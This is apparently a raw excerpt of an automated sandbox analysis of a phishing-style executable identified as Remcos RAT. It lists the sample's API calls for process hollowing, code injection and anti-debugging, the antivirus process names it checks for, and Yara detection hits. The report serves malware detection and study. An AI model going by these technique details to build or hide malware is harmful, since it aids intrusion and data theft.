                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409253
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041C291
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040C34D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409665
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_0040880C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040783C FindFirstFileW,FindNextFileW,4_2_0040783C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00419AF5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040BB30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040BD37
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_274C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_274C10F1
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_1_00409253
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_1_0041C291
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_1_0040C34D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_1_00409665
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_1_0040880C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0040783C FindFirstFileW,FindNextFileW,4_1_0040783C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_1_00419AF5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_1_0040BB30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_1_0040BD37
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00407C97
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_00418981 memset,GetSystemInfo,5_2_00418981
                  Source: SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                  Source: SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008BF000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1752355443.00000000241B3000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1795698080.00000000241B3000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4155660149.00000000241B8000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1795698080.00000000241B8000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1752355443.00000000241B8000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1795167395.00000000241B8000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000003.1882438284.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000003.1882438284.000000000086A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: bhv1938.tmp.5.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                  Source: Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000613000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000002.1940504493.0000000000620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW-spov-0006.spov-msedge.netLMEM@0
                  Source: bhv1938.tmp.5.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeAPI call chain: ExitProcess graph end nodegraph_0-36367
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifAPI call chain: ExitProcess graph end nodegraph_4-54448
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004349F9
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_028D7AC0
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004432B5 mov eax, dword ptr fs:[00000030h]4_2_004432B5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_274C4AB4 mov eax, dword ptr fs:[00000030h]4_2_274C4AB4
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_004432B5 mov eax, dword ptr fs:[00000030h]4_1_004432B5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,4_2_00411CFE
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004349F9
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00434B47 SetUnhandledExceptionFilter,4_2_00434B47
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043BB22
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00434FDC
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_274C2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_274C2639
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_274C60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_274C60E2
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_274C2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_274C2B1C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_1_004349F9
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00434B47 SetUnhandledExceptionFilter,4_1_00434B47
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_1_0043BB22
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_00434FDC

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeMemory allocated: C:\Users\Public\Libraries\lhgtogaW.pif base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeMemory allocated: C:\Users\Public\Libraries\lhgtogaW.pif base: 121A0000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFMemory allocated: C:\Users\Public\Libraries\lhgtogaW.pif base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFMemory allocated: C:\Users\Public\Libraries\lhgtogaW.pif base: 121A0000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFMemory allocated: C:\Users\Public\Libraries\lhgtogaW.pif base: 400000 protect: page execute and read and write
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFMemory allocated: C:\Users\Public\Libraries\lhgtogaW.pif base: 1E060000 protect: page execute and read and write
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,4_2_004180EF
                  Maps a DLL or memory area into another process
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifSection loaded: NULL target: C:\Users\Public\Libraries\lhgtogaW.pif protection: execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifSection loaded: NULL target: C:\Users\Public\Libraries\lhgtogaW.pif protection: execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifSection loaded: NULL target: C:\Users\Public\Libraries\lhgtogaW.pif protection: execute and read and writeJump to behavior
                  Sample uses process hollowing technique
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection unmapped: C:\Users\Public\Libraries\lhgtogaW.pif base address: 400000Jump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFSection unmapped: C:\Users\Public\Libraries\lhgtogaW.pif base address: 400000Jump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFSection unmapped: C:\Users\Public\Libraries\lhgtogaW.pif base address: 400000
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeMemory written: C:\Users\Public\Libraries\lhgtogaW.pif base: 222008Jump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFMemory written: C:\Users\Public\Libraries\lhgtogaW.pif base: 36F008Jump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFMemory written: C:\Users\Public\Libraries\lhgtogaW.pif base: 271008
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe4_2_00412117
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe4_1_00412117
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00419627 mouse_event,4_2_00419627
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pifJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\zhrdpmieysz"Jump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\kbfnqftxmarjte"Jump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\mekgrxezaijovlxyi"Jump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pifJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif
                  Source: lhgtogaW.pif, 00000004.00000003.1795698080.000000002419F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerh
                  Source: lhgtogaW.pif, 00000004.00000003.1795698080.000000002419F000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4155660149.000000002419F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: lhgtogaW.pif, 00000004.00000002.4155660149.00000000241B8000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4155660149.000000002419F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerBG\
                  Source: lhgtogaW.pif, 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerW
                  Source: lhgtogaW.pif, 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: lhgtogaW.pif, 00000004.00000003.1752355443.00000000241A6000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4155660149.00000000241A6000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1795167395.00000000241A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00434C52 cpuid 4_2_00434C52
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_028DD5D0
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_028C5A90
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: GetLocaleInfoA,0_2_028CA780
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: GetLocaleInfoA,0_2_028CA7CC
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_028C5B9C
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_028DD5D0
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_028E5FA0
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: GetLocaleInfoA,4_2_0040F8D1
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: EnumSystemLocalesW,4_2_00452036
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_004520C3
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: GetLocaleInfoW,4_2_00452313
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: EnumSystemLocalesW,4_2_00448404
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_0045243C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: GetLocaleInfoW,4_2_00452543
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00452610
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: GetLocaleInfoW,4_2_004488ED
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00451CD8
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: EnumSystemLocalesW,4_2_00451F50
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: EnumSystemLocalesW,4_2_00451F9B
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: GetLocaleInfoA,4_1_0040F8D1
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: EnumSystemLocalesW,4_1_00452036
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_1_004520C3
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: GetLocaleInfoW,4_1_00452313
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: EnumSystemLocalesW,4_1_00448404
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_1_0045243C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: GetLocaleInfoW,4_1_00452543
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_1_00452610
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: GetLocaleInfoW,4_1_004488ED
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_1_00451CD8
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: EnumSystemLocalesW,4_1_00451F50
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: EnumSystemLocalesW,4_1_00451F9B
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028C91C8 GetLocalTime,0_2_028C91C8
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0041B60D GetComputerNameExW,GetUserNameW,4_2_0041B60D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004493AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,4_2_004493AD
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028CB748 GetVersionExA,0_2_028CB748
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4156653259.0000000025BBF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
